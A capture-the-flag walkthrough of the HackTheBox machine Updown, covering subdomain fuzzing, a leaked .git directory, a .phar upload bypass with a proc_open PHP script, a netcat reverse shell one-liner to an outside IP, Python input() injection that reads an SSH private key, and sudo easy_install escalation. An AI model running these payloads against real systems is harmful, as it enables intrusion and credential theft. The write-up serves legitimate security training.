HackTheBox — Updown

ARZ101
6 min readJan 21, 2023

--

Updown, a medium rated linux machine involved fuzzing for subdomain leading to a dev domain which was accessible through a special header found from .git directory, the site had a file upload for the purpose of check the reachability of the sites in that file which lead to remote code execution and giving us a shell as www-data, in developer user’s directory there exists a script using input function which is vulnerable as it basically equivalent to eval function which can execute commands giving us shell as developer user, from there escalation privileges to root by running easy_install .

NMAP

Nmap scan report for 10.10.11.177
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

The web page has a functionality to check if any site is up also it shows us a domain name siteisup.htb so let's add this in hosts file

With the debug mode enabled we can see the response made on the url which leads to Server Side Request Forgery (SSRF)

I tried using the file protocol to read local file file:///etc/passwd but it was blocked

On the domain name, we can fuzz for subdomains with wfuzz

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://siteisup.htb' -H "Host: FUZZ.siteisup.htb" --hh 1131

This finds a subdomain dev with 403 status code

We can try accessing it through the status check as there exists SSRF

But it shows that it’s down so there maybe some filtering going on dev site, fuzzing for files and directories, it shows /dev but it returns a blank page

So fuzzing at /dev/, we'll find .git

We can download .git though wget recursively with --recusrive

wget --recursive http://10.10.11.177/dev/.git/

After downloading the files, navigate to directory which has .git and run git checkout . to recover the files

Checking changelog.txt it talks about removing the upload option

.htaccess file shows us a header if it's not in the request, the request will be denied

I used a burp extension called Add Custom Header so that on every request the special header gets added

Looking at checker.php file it checks for file extensions which may lead to uploading php files to get code execution

It’s checking for all extensions except for .phar, but even if we upload it it's going to read the contents of the file, make a request to see if there's 200 status code and it's going to delete the file after making a request to each of the content available in the file

To get code execution, we can make the site make a request to a site which isn’t reachable so it’s going to try to make a request to that site for sometime and our uploaded file won’t get deleted

Foothold

From phpinfo() we can see most of the functions are disabled that could allow command execution, to find out which function can used to get command execution which can use this script

We can abuse proc_open to get command execution

<?php
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("bash", $descriptorspec, $pipes);
if (is_resource($process)) {
// $pipes now looks like this:
// 0 => writeable handle connected to child stdin
// 1 => readable handle connected to child stdout
// Any error output will be appended to /tmp/error-output.txt
fwrite($pipes[0], "id");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
// It is important that you close any pipes before calling
// proc_close in order to avoid a deadlock
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>

On uploading the file, we’ll get the output of id command

Using nc mkinfo we can get the reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f

Privilege Escalation (developer)

In developer's directory we can find siteisup binary along with it's source code which can run as developer because of SUID

We can exploit this by importing os module and executing id command

__import__('os').system('id')

From here we can get the ssh key and login as developer user

__import__('os').system('cat /home/developer/.ssh/id_rsa')

Privilege Escalation (root)

Running sudo -l will show that we can run /usr/local/bin/easy_install as root user

We can abuse this by checking GTFOBINS for the abuse

References

--

--